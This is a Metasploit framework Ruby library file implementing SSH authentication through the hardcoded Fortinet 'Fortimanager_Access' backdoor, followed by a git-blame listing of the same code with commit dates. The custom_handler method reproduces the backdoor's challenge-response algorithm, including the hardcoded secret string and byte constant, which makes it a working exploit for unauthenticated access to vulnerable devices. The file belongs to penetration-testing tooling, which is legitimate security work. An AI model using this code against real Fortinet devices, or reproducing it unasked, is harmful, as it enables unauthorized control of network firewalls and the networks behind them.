lib/msf/core/exploit/fortinet.rb

# -*- coding: binary -*-

# https://www.ietf.org/rfc/rfc4252.txt
# https://www.ietf.org/rfc/rfc4256.txt

require 'net/ssh'

module Msf::Exploit::Remote::Fortinet
  class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract

    USERAUTH_INFO_REQUEST  = 60
    USERAUTH_INFO_RESPONSE = 61

    def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }

      send_message(userauth_request(
=begin
        string    user name
        string    service name
        string    "password"
        boolean   FALSE
        string    plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
=end
        username,
        service_name,
        'password',
        false,
        password || ''
      ))

      tried = false

      loop do
        message = session.next_message

        return false unless message

        case message.type
        when USERAUTH_SUCCESS
          debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
          return true
        when USERAUTH_FAILURE
          debug { 'Received SSH_MSG_USERAUTH_FAILURE' }

          break if tried

          debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }

          send_message(userauth_request(
=begin
            string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
            string    service name (US-ASCII)
            string    "keyboard-interactive" (US-ASCII)
            string    language tag (as defined in [RFC-3066])
            string    submethods (ISO-10646 UTF-8)
=end
            username,
            service_name,
            'keyboard-interactive',
            '',
            ''
          ))

          tried = true
        when USERAUTH_INFO_REQUEST
          debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }

=begin
          string    name (ISO-10646 UTF-8)
          string    instruction (ISO-10646 UTF-8)
          string    language tag (as defined in [RFC-3066])
          int       num-prompts
          string    prompt[1] (ISO-10646 UTF-8)
          boolean   echo[1]
          ...
          string    prompt[num-prompts] (ISO-10646 UTF-8)
          boolean   echo[num-prompts]
=end
          name        = message.read_string
          instruction = message.read_string
          _           = message.read_string

          prompts = []

          message.read_long.times do
            prompt   = message.read_string
            echo     = message.read_bool
            prompts << [prompt, echo]
          end

          debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }

          send_message(Net::SSH::Buffer.from(
=begin
            byte      SSH_MSG_USERAUTH_INFO_RESPONSE
            int       num-responses
            string    response[1] (ISO-10646 UTF-8)
            ...
            string    response[num-responses] (ISO-10646 UTF-8)
=end
            :byte,   USERAUTH_INFO_RESPONSE,
            :long,   1,
            :string, custom_handler(name, instruction, prompts)
          ))
        else
          raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
        end
      end
    end

    # http://seclists.org/fulldisclosure/2016/Jan/26
    def custom_handler(title, instructions, prompt_list)
      n = prompt_list[0][0]
      m = Digest::SHA1.new
      m.update("\x00" * 12)
      m.update(n + 'FGTAbc11*xy+Qqz27')
      m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
      h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
      [h]
    end

  end
end
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`# -- coding: binary --`

Finally fix "Unknown admin user ''" after 2yrs 2018-02-21 20:05:02 -06:00			`# https://www.ietf.org/rfc/rfc4252.txt`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`# https://www.ietf.org/rfc/rfc4256.txt`

Move Fortinet backdoor to module and library 2016-02-27 18:19:14 -06:00			`require 'net/ssh'`

Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`module Msf::Exploit::Remote::Fortinet`
			`class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`USERAUTH_INFO_REQUEST = 60`
			`USERAUTH_INFO_RESPONSE = 61`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`def authenticate(service_name, username = 'Fortimanager_Access', password = nil)`
Finally fix "Unknown admin user ''" after 2yrs 2018-02-21 20:05:02 -06:00			`debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`send_message(userauth_request(`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`=begin`
Finally fix "Unknown admin user ''" after 2yrs 2018-02-21 20:05:02 -06:00			`string user name`
			`string service name`
			`string "password"`
			`boolean FALSE`
			`string plaintext password in ISO-10646 UTF-8 encoding [RFC3629]`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`=end`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`username,`
			`service_name,`
Finally fix "Unknown admin user ''" after 2yrs 2018-02-21 20:05:02 -06:00			`'password',`
			`false,`
			`password \|\| ''`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`))`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Fix #9602 , a little defensive programming 2018-02-26 16:51:23 -06:00			`tried = false`

Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`loop do`
			`message = session.next_message`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Fix #9602 , a little defensive programming 2018-02-26 16:51:23 -06:00			`return false unless message`

Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`case message.type`
			`when USERAUTH_SUCCESS`
			`debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }`
			`return true`
			`when USERAUTH_FAILURE`
			`debug { 'Received SSH_MSG_USERAUTH_FAILURE' }`
Fix #9602 , a little defensive programming 2018-02-26 16:51:23 -06:00
			`break if tried`

Finally fix "Unknown admin user ''" after 2yrs 2018-02-21 20:05:02 -06:00			`debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }`

			`send_message(userauth_request(`
			`=begin`
			`string user name (ISO-10646 UTF-8, as defined in [RFC-3629])`
			`string service name (US-ASCII)`
			`string "keyboard-interactive" (US-ASCII)`
			`string language tag (as defined in [RFC-3066])`
			`string submethods (ISO-10646 UTF-8)`
			`=end`
			`username,`
			`service_name,`
			`'keyboard-interactive',`
			`'',`
			`''`
			`))`
Fix #9602 , a little defensive programming 2018-02-26 16:51:23 -06:00
			`tried = true`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`when USERAUTH_INFO_REQUEST`
			`debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
			`=begin`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`string name (ISO-10646 UTF-8)`
			`string instruction (ISO-10646 UTF-8)`
			`string language tag (as defined in [RFC-3066])`
			`int num-prompts`
			`string prompt[1] (ISO-10646 UTF-8)`
			`boolean echo[1]`
			`...`
			`string prompt[num-prompts] (ISO-10646 UTF-8)`
			`boolean echo[num-prompts]`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`=end`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`name = message.read_string`
			`instruction = message.read_string`
			`_ = message.read_string`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`prompts = []`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`message.read_long.times do`
			`prompt = message.read_string`
			`echo = message.read_bool`
			`prompts << [prompt, echo]`
			`end`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`send_message(Net::SSH::Buffer.from(`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`=begin`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`byte SSH_MSG_USERAUTH_INFO_RESPONSE`
			`int num-responses`
			`string response[1] (ISO-10646 UTF-8)`
			`...`
			`string response[num-responses] (ISO-10646 UTF-8)`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`=end`
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`:byte, USERAUTH_INFO_RESPONSE,`
			`:long, 1,`
			`:string, custom_handler(name, instruction, prompts)`
			`))`
			`else`
			`raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"`
			`end`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`end`
			`end`

Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`# http://seclists.org/fulldisclosure/2016/Jan/26`
			`def custom_handler(title, instructions, prompt_list)`
			`n = prompt_list[0][0]`
			`m = Digest::SHA1.new`
			`m.update("\x00" * 12)`
			`m.update(n + 'FGTAbc11*xy+Qqz27')`
			`m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")`
			`h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)`
			`[h]`
			`end`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00
Recreate Msf::Exploit::Remote::Fortinet 2016-02-29 14:56:49 -06:00			`end`
Add Fortinet backdoor 2016-02-25 14:40:02 -06:00			`end`